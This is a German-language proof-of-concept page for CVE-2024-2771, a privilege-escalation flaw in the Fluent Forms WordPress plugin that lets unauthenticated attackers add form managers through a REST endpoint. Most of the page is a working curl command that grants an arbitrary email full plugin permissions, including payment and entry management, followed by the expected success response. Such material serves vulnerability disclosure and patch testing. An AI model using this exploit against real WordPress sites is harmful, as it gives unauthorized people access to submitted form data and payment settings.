
Proof-of-Concept-Exploit für CVE-2024-2771, eine Berechtigungserweiterungs-Schwachstelle im Fluent Forms WordPress-Plugin über einen nicht authentifizierten REST-API-Endpunkt.
CVE-2024-2771 Proof-of-Concept
Das Contact Form Plugin von Fluent Forms für Quiz, Survey und Drag & Drop WP Form Builder Plugin für WordPress ist anfällig für Privilegieneskalation aufgrund einer fehlenden Berechtigungsprüfung im REST-API-Endpunkt /wp-json/fluentform/v1/managers in allen Versionen bis einschließlich 5.1.16. Dies ermöglicht es nicht authentifizierten Angreifern, Benutzern Fluent-Form-Verwaltungsberechtigungen zu erteilen, die ihnen Zugriff auf alle Einstellungen und Funktionen des Plugins gewähren. Ebenso können nicht authentifizierte Angreifer Manager-Konten löschen.
Voraussetzungen
Exploit-Befehl
# 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
-H "Content-Type: application/json" \
-d '{
"manager": {
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}'
Erwartete Antwort
HTTP/1.1 200 OK
{
"message": "Manager has been saved.",
"manager": {
"id": 2,
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}
Bildschirmfoto
